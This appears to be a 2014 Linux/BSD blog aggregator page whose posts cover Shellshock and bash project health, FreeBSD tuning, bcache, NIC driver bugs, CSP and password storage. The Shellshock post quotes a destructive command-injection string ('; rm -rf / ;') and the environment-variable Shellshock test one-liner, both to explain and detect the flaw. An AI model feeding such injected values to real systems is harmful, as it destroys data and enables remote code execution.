First there was Heartbleed, with its discoverers deciding to spend time setting up a cool name, logo and website for it, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork, which I'm still not sure is going to stick around or not.

Just a few weeks ago a dump of passwords caused a major stir, as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault that the photos of a bunch of celebrities were stolen and published on a bunch of sites — and they will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock, which I already dug into. What I promised in that post was a look at the problem from the angle of project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and catered for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers didn't care to follow what the distributors do, or to review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is the FSF's choice of UNIX shell. The fact that the man page clearly states "It's too big and too slow." should tip people off, but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using it as one — but that is also a big part of what caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good by me, as I moved to zsh years and years ago, and I have been working for over five years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer, as the GNU website calls him, Chet Ramey – and the sole point of contact with him is the mailing lists. The code is released in dumps: a release tarball for each minor version, then, every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can see this when emerging bash: all the patches are applied one on top of the other.
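
To make the release model concrete, here is a rough sketch of how a point release is assembled from the base tarball plus the published patches (the URLs follow the usual GNU mirror layout, the patch count is illustrative; check the mirror for the actual list):
# Fetch the 4.3 base tarball and the official patches published so far.
wget https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
wget https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-0{01..27}
tar xf bash-4.3.tar.gz && cd bash-4.3
# Each numbered patch bumps the patch level by one; upstream documents applying them with -p0.
for p in ../bash43-0??; do patch -p0 < "$p"; done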

There is no public SCM — yes, there is a GIT "repository", but it's essentially just an import of a given release tarball, with each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful as having a repository where the intent of each change shows clearly, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere; glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts, is sanity being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years: not this particular vulnerability, but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while; Debian has already done it, and the result is that the vulnerability is way less scary for them.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but unlike many other projects it is not developed in the open; it is developed behind closed doors, with a single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

Limiting the #shellshock fear

by Flameeyes via Flameeyes's Weblog »

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash as their default shell for years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

Using system() is already a red flag for me in lots of server-side software: input sanitization is essential in that situation, as otherwise passing user-provided strings in a system() call makes it trivial to implement remote code execution. Think of software using system("convert %s %s-thumb.png") with a user-provided string, and let the user provide ; rm -rf / ; as their input… can you see the problem? But with this particular bash bug, you don't need user-supplied strings to be passed to system(): the mere call will cause the environment to be copied over and thus the code executed. But this relies on /bin/sh being bash, which is not the case for the BSDs, Debian, Ubuntu and a bunch of other situations. And it also requires the attacker to be able to control an environment variable.
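
For reference, this is the widely circulated one-liner for checking the original CVE-2014-6271 behaviour: a function definition exported through the environment, with trailing commands that a vulnerable bash runs while importing it.
# A patched bash only prints "this is a test"; a vulnerable one prints "vulnerable" first.
env x='() { :;}; echo vulnerable' bash -c 'echo this is a test'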

This does not mean that there is absolutely no risk for Debian or Ubuntu users (or even FreeBSD, but that's a different problem): if you control an environment variable, and somehow the web application invokes (even indirectly) a bash script (through system() or otherwise), then you're also vulnerable. This can be the case if the invoked script has #!/bin/bash explicitly in it. Funnily enough, this is how most clients are vulnerable to this problem: the ISC DHCP client dhclient uses a helper script called dhclient-script to set some special options it receives from the server; at least in the Debian/Ubuntu packages of it, the script uses #!/bin/bash explicitly, making those systems vulnerable even if their default shell is not bash.
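
A rough way to spot scripts that explicitly request bash regardless of what /bin/sh points to (the paths here are just examples, adjust them to your system):
# Lists files whose shebang asks for bash explicitly.
grep -rl '^#!/bin/bash' /sbin/dhclient-script /etc/init.d 2>/dev/null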

But who seriously uses CGI nowadays in production? Turns out that a bunch of people using WordPress do, to run PHP — and I'm sure there are scripts using system(). If this is a nail in the coffin of something, my opinion is that it should be in the coffin of the self-hosting mantra that people still insist on.

On the other hand, the focus of the tech field right now is CGI running in small devices, like routers, TVs, and so on and so forth. It is indeed the case that the majority of those devices implement their web interfaces through CGI, because it's simple and proven, and does not require complex web servers such as Apache. This is what scared plenty of tech people, but it's a scare that has not been researched properly either. While it's true that most of my small devices use CGI, I don't think any of them uses bash. In the embedded world, the majority of the people out there wouldn't go near bash with a ten-foot pole: it's slow, it's big, and it's clunky. If you're building an embedded image, you probably already have busybox around, and you may as well use it as your shell. It also allows you to use the in-process version of most commands without requiring a full fork.

It's easy to see how you go from A to Z here: "bash makes CGI vulnerable" and "nearly all embedded devices use CGI" become "bash makes nearly all embedded devices vulnerable". But that's not true: as SANS points out, only a small fraction of the devices is actually vulnerable to this attack. Which does not mean the attack is irrelevant. It's important, and it should tell us many things.

I'll be writing again regarding "project health" and talking a bit more about bash as a project. In the meantime, make sure you update, don't believe the first news of "all fixed" (as Tavis pointed out, the first fix was not thought out properly) and make sure you don't self-host the stuff you want to keep out of the cloud on a server you upgrade once a year.

BASH shell bug

by Josh Smith via Official PC-BSD Blog »

As many of you are probably aware, there is a serious security issue that is currently all over the web regarding the GNU BASH shell.  We at the PC-BSD project are well aware of the issue, a fix is already in place to plug this security hole, and packages with this fix are currently building. Look for an update to your BASH shell within the next 24 hours in the form of a package update.

As a side note: nothing written by the PC-BSD project uses BASH in any way — and BASH is not built into the FreeBSD operating system itself (it is an optional port/package), so the level of severity of this bug is lower on FreeBSD than on other operating systems.

On the FreeBSD mailing list, Bryan Drewery has already sent a notice that the port is fixed in FreeBSD. Since he also added some good recommendations for BASH users in that email, we decided to copy it here for anyone else that is interested.
_______________

From: Bryan Drewery — FreeBSD mailing list

The port is fixed with all known public exploits. The package is
building currently.

However bash still allows the crazy exporting of functions and may still
have other parser bugs. I would recommend for the immediate future not
using bash for forced ssh commands as well as these guidelines:

1. Do not ever link /bin/sh to bash. This is why it is such a big
problem on Linux, as system(3) will run bash by default from CGI.
2. Web/CGI users should have shell of /sbin/nologin.
3. Don’t write CGI in shell script / Stop using CGI
4. httpd/CGId should never run as root, nor “apache”. Sandbox each
application into its own user.
5. Custom restrictive shells, like scponly, should not be written in bash.
6. SSH authorized_keys/sshd_config forced commands should also not be
written in bash.
_______________

For more information on the bug itself, you can visit Ars Technica and read the article by clicking the link below.

http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

Conferencing

by Flameeyes via Flameeyes's Weblog »

This past weekend I had the honor of hosting the VideoLAN Dev Days 2014 in Dublin, in the headquarters of my employer. This is the first time I have organized a conference (or rather helped organize it: Audrey and our staff did most of the heavy lifting), and I made a number of mistakes, but I think I can learn from them and do better the next time I try something like this.


Photo credit: me
Organizing an event in Dublin has some interesting and not-obvious drawbacks, one of which is the need for a proper visa for people who reside in Europe but are not EEA citizens, thanks to the fact that Ireland is not part of Schengen. I was expecting at least UK residents not to need any scrutiny, but Derek proved me wrong as he had to get an (easy) visa at entrance.

Getting just shy of a hundred people into a city like Dublin, which is far from being a metropolis like Paris or London, is an interesting exercise: yes, we had the space for the conference itself, but finding hotels and restaurants for that many people became tricky. A very positive shout-out is due to Yamamori Sushi, which hosted all of us without a fixed menu and without a hitch.

As usual, meeting in person with the people you work with in open source is a perfect way to improve collaboration — knowing how people behave face to face makes it easier to understand their behaviour online, which is especially useful when attitudes can be a bit grating online. And given that many people, including me, are known as proponents of Troll-Driven Development – or Rant-Driven Development, given that people like Anons, redditors and 4channers have given an even worse connotation to "troll" – it's really a requirement if you are seriously interested in being part of the community.

This time around, I was even able to stop myself from gathering too much swag! I decided not to pick up a hoodie, and leave it to people who would actually use it, although I did pick up a Gandi VLC shirt. I hope I'll be able to do that at LISA as I'm bound there too, and last year I came back with way too many shirts and other swag.

After SELinux System Administration, now the SELinux Cookbook

by swift via Simplicity is a form of art... »

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covers SELinux administration commands and focuses on Linux administrators who need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring of this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and on tuning SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and is even the reference platform), even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book development contributed well to the final result (something that I overlooked a bit the first time, so this time I re-reviewed changes over and over again – after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting), but for me this is a major milestone, which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read as I intended it to be.


More than 15 cents

by Hanno Böck via Hanno's blog »

For months now we have been able to read new horror stories about the spread of Ebola almost every day. I don't think I need to repeat them here.

For many of us - myself included - Ebola is far away, and not only in the geographical sense. I have never seen an Ebola patient, and I know almost nothing about the affected countries such as Sierra Leone, Liberia or Guinea. I am sure many people feel the same way. Many of the reports I have only taken in at the margins. But one thing has stuck with me: the problem is not that we wouldn't know how to stop Ebola. The problem is that it is not being done, that those who want to help - often risking their own lives - are not being given sufficient resources.

One figure I read in the past few days keeps occupying me: the German federal government has so far made 12 million euros available for Ebola relief. That works out to roughly 15 cents per inhabitant. I lack the words to describe that adequately; it is somewhere between embarrassing, irresponsible and scandalous. Germany is one of the wealthiest countries in the world. I will spare myself comparisons with bank bailouts or underground railway stations.

Yesterday I donated to Ärzte ohne Grenzen (Doctors Without Borders). As far as I can tell, they are currently the most important organisation trying to help on the ground. Everything I know about Doctors Without Borders gives me the feeling that my money is in good hands there. It was an amount several orders of magnitude higher than 15 cents, but it was also an amount that, given my financial means, does not hurt me.

I don't actually think this is right. I think it should go without saying that the international community helps in an emergency like this. Whether a deadly disease gets fought or not should not depend on donations. I actually want to pay for something like this with my taxes. But the reality is: right now, that is not happening.

I am not writing this to stress how great I am. I am writing it because I want to ask you, the person reading this right now, to do the same. I believe everyone reading this is able to donate more than 15 cents. Donate an amount that seems affordable and appropriate given your financial situation. Right now. It only takes a few minutes:

Donate online to Ärzte ohne Grenzen (Doctors Without Borders)

(I would be happy to see this post spread and shared - for example with the hashtag #mehrals15cent)

A daemonic web slingshot

by Jesco Freund via My Universe »

Apache and Nginx are (at least according to Netcraft) among the most widely used web servers. Anyone running one of these two web servers on top of FreeBSD can give it a serious speed boost, and lower the system load along the way. No black magic is needed for that, just a kernel module¹ called accf_http. It is by no means new, by the way; it was introduced with FreeBSD 4.0 and has thus been around for a good 14 years.

Behind it is a module from the accept_filter family that is tailored specifically to the HTTP protocol. It causes FreeBSD's network stack to receive the complete HTTP request first, before the socket signals to the application that an incoming connection has arrived. The logic for parsing incomplete HTTP requests can therefore safely be switched off, since the web server can rely on being handed a complete request.

Another side effect: incomplete requests no longer block a web server process or thread, which is why the Apache web server in particular benefits from the HTTP accept filter. Nginx works with non-blocking sockets and, unlike most Apache MPMs, does not reserve an extra thread or process for each incoming connection, so incomplete requests do not push Nginx into spawning additional processes or threads. However, Nginx still has to keep checking all accepted connections to find out which of them finally holds a complete request.

By design, the resource savings with Nginx are therefore not as large as with Apache. Since only complete requests end up in the connection queue, however, the processing of requests is sped up significantly, which matters most when answering a request itself takes hardly any compute time (for instance because it is served from a cache). An elaborate dynamic web application benefits less here, since the bulk of the total response time is spent computing the answer rather than receiving the request.

So how do you get to enjoy this functionality? Apache users merely have to make sure that the kernel module is loaded before the server starts, for example by adding it to /boot/loader.conf:

accf_http_load="YES"  
If the module is available, or has been compiled into the kernel, Apache uses the accept filter without any further intervention. If it is not available, Apache even complains outright with a warning:

[warn] No such file or directory: Failed to enable the 'httpready' Accept Filter
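
For completeness, the module can also be loaded and checked at runtime without a reboot (the loader.conf entry above is still what makes it persistent across reboots):
kldload accf_http      # load the accept filter right away
kldstat -m accf_http   # verify that the module is present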

Nginx, on the other hand, needs a little encouragement to make use of the accept filter:

server {  
    listen 127.0.0.1:80 accept_filter=httpready;
    ...
}
In fairness it has to be said that this alone does not do the job. To gain real performance rather than just saving resources, there is no way around looking into other tuning options as well and finding settings that match the web server's actual workload. Keywords here are the sysctl variables kern.ipc.soacceptqueue, kern.ipc.maxsockbuf, net.inet.tcp.sendspace and net.inet.tcp.recvspace. More extensive information on this is offered, for example, by the Network Tuning Guide on Calomel.org.
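
Purely as an illustration of where to start (the values below are made up and need to be tuned to the actual workload and hardware):
# Inspect the current values first ...
sysctl kern.ipc.soacceptqueue kern.ipc.maxsockbuf net.inet.tcp.sendspace net.inet.tcp.recvspace
# ... then experiment, e.g. with a larger accept queue and bigger socket buffers,
# and persist the winners in /etc/sysctl.conf once they have proven themselves.
sysctl kern.ipc.soacceptqueue=1024
sysctl kern.ipc.maxsockbuf=4194304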

¹ Alternatively, the filter can be compiled statically into the kernel with options ACCEPT_FILTER_HTTP

Outreach Program for Women

by lu_zero via Luca Barbato »

Libav participated in the summer edition of the OPW. We had three interns: Alexandra, Katerina and Nidhi.

Projects

The three interns had different starting skills so the projects picked had a different breadth and scope.

Small tasks

Everybody has to start from a simple task and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In the Libav case we have plenty of spots that require extra care and usually hidden bugs get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start: she tried to use coccinelle to fix a whole class of issues in a single swoop. I’m still reviewing the patch and splitting it into smaller chunks to single out false positives. The patch itself shone a spotlight on some of the most horrible code still lingering around; hopefully we’ll get to fix those parts soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks; they honed their skills by reimplementing the ASF and RealMedia demuxers, respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love, plenty of overly long files, and lots of small quirks that should be ironed out. Libav (as any other big project) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and on helping others do the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and making it work at least as well as the former), but both kinds of tasks are fundamental to keeping the project healthy!

In closing

All the projects have been a success and we are looking forward to seeing further contributions from our new members!

bcache

by Patrick via Patrick's playground »

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that has become the new rootfs initially.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive, I copied all data away, reformatted the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The RAID5 stays as it is, but gets reformatted with bcache.
In code:
wipefs -a /dev/md0 # remove old headers to unconfuse bcache (without -a wipefs only lists them)
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018
Tadaah!
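
Two sysfs knobs I find handy for sanity-checking the setup (paths as seen on my kernel, they may differ slightly between versions):
cat /sys/block/bcache0/bcache/state       # should report "clean" or "dirty" once the cache is attached
cat /sys/block/bcache0/bcache/cache_mode  # the active mode is shown in brackets, e.g. [writeback]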

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsivity while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe two thirds of the SSD's native speed, but I now have 1TB of storage at that speed - for a $25 upgrade that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms


Definitely awesome!

FreeBSD 10.1-BETA2 Available

by Webmaster Team via FreeBSD News Flash »

The second BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

UDP RSS update: ixgbe(4) turned out to have issues..

by Adrian via Adrian Chadd's Ramblings »

I started digging deeper into the RSS performance on my home test platform. Four cores and one (desktop) socket isn't all that much, but it's a good starting point for this.

It turns out that there was some lock contention inside netisr. Which made no sense, as RSS should be keeping all the flows local to each CPU.

After a bunch of digging, I discovered that the NIC was occasionally receiving packets into the wrong ring. Have a look at this:

Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff80047713d00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742e100; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c2e00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff800474c5000; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100034:
m=0xfffff8004742ec00; flowid=0x21f7db62; rxr->me=3
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff8004727a700; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f11600; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80047279b00; flowid=0x335a5c03; rxr->me=2
Sep 12 08:04:32 adrian-hackbox kernel: ix0: ixgbe_rxeof: 100032:
m=0xfffff80006f0b700; flowid=0x335a5c03; rxr->me=2

The RX flowid was correct - I hashed the packets in software too and verified the software hash equaled the hardware hash. But they were turning up on the wrong receive queue. "rxr->me" is the queue id; the hardware should be hashing on the last 7 bits. 0x3 -> ring 3, 0x2 -> ring 2.

It also only happened when I was sending traffic to more than one receive ring. Everything was okay if I just transmitted to a single receive ring.

Luckily for me, some developers from Verisign saw some odd behaviour in their TCP stress testing and had dug in a bit further. They were seeing corrupted frames on the receive side that looked a lot like internal NIC configuration state. They figured out that the ixgbe(4) driver wasn't initialising the flow director and receive units correctly - the FreeBSD driver was not correctly setting up the amount of memory each was allocated on the NIC and they were overlapping. They also found a handful of incorrectly handled errors and double-freed mbufs.

So, with that all fixed, their TCP problem went away and my UDP tests started properly behaving themselves. Now all the flows are ending up on the right CPUs.

The flow director code was also dynamically programming flows into the NIC to try and rebalance traffic. Trouble is, I think it's a bit buggy and it's likely not working well with large receive offload (LRO).

What's it mean for normal people? Well, it's fixed in FreeBSD-HEAD now. I'm hoping I or someone else will backport it to FreeBSD-10 soon. It fixes my UDP tests - now I hit around 1.3 million packets per second transmit and receive on my test rig; the server now has around 10-15% CPU free. It also fixed issues that Verisign were seeing with their high transaction rate TCP tests. I'm hoping that it fixes the odd corner cases that people have seen with Intel 10 gigabit hardware on FreeBSD and makes LRO generally more useful and stable.

Next up - some code refactoring, then finishing off IPv6 RSS!

 

Some experience with Content Security Policy

by Hanno Böck via Hanno's blog »

I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example of how to get IT security right.

The main reason CSP exists is cross-site scripting vulnerabilities (XSS). Every time a malicious attacker is able to somehow inject JavaScript or other executable code into your webpage, this is called an XSS. XSS vulnerabilities are among the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: how can we prevent XSS from happening at all? The way to do this is that the web server sends a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly, CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large re-engineering of existing code. Preferably, CSP should be part of the development process right from the beginning. If you start a web project, keep that in mind and educate your developers to use a restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS-free because it doesn't use any untrusted input; I mainly wanted an easy target to do some testing on. I also tried to add CSP to this blog, but this turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea of what a more realistic policy looks like, this is the one from GitHub:
Content-Security-Policy: default-src *; script-src assets-cdn.github.com www.google-analytics.com collector-cdn.github.com; object-src assets-cdn.github.com; style-src 'self' 'unsafe-inline' 'unsafe-eval' assets-cdn.github.com; img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.githubusercontent.com *.gravatar.com *.wp.com; media-src 'none'; frame-src 'self' render.githubusercontent.com gist.github.com www.youtube.com player.vimeo.com checkout.paypal.com; font-src assets-cdn.github.com; connect-src 'self' ghconduit.com:25035 live.github.com uploads.github.com s3.amazonaws.com
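
If you want to see which policy a site currently sends, a quick way is to look at the response headers (github.com here is only an example host):
curl -sI https://github.com/ | grep -i '^content-security-policy'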

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something via CSP, it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support, I'm looking at you, Internet Explorer), and we want to know if our policy breaks anything that is supposed to work. The way this works is that a JSON file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practice I found it to be quite disappointing. As I said above, I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However, I get lots of them and they are all false positives. The problem is browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that a combination of HTTPS Everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this, and whether this is something that should be reported as a bug either to the browser vendors or to the extension developers.

Conclusion

If you start a web project, use CSP. If you have a web page that needs extra security, use CSP (my bank doesn't - does yours?). CSP reporting is neat, but its usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example of a similar technology is prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.

Buffer overflows were first documented in 1972 and they are still the source of many security issues. Fixing them for good is trickier, but it is also possible.

Password security in network applications

by Michał Górny via Michał Górny »

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, and it doesn’t discriminate against anyone in particular. It just works™.

The key requirement for maintaining the security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important that the designer of a network application regards the safety of the password as essential and does their best to protect it.

In particular, the developer can affect the security of the password in three ways:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.
I will expand on each of them in order.



Security of server-side key storage

For the secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since this can be valuable information, it should be specially protected so that even in case of unauthorized access to the system the attacker cannot obtain it easily.

This could be achieved through the use of key derivation functions, for example. In this case, a derived key is computed from the user-provided password and used in the system. With a good design, the password could actually never leave the client’s computer — it can be converted straight to the derived key there, and the derived key may be used from this point forward. Therefore, the best that an attacker could get is the derived key, with no trivial way of obtaining the original secret.
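
As a minimal sketch of the storage side (assuming nothing about any particular stack): store only a salted hash produced by a deliberately slow function instead of the cleartext password. SHA-512-crypt via the openssl CLI is just a stand-in here; a memory-hard KDF such as scrypt or Argon2 would be preferable.
# Prints something like $6$<salt>$<hash>; only this string should ever reach the database.
openssl passwd -6 -salt 'x7GpQ2Lr' 'correct horse battery staple'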

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.
It is crucial that none of those primitives can be used without proving the necessary user authorization. The service must provide no means to obtain the current password, or to set a new password without proving user authorization. For example, a password reset would have to be confirmed using an authentication token that is sent to the user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, bypassing the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over the network are the most security-sensitive processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points briefly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
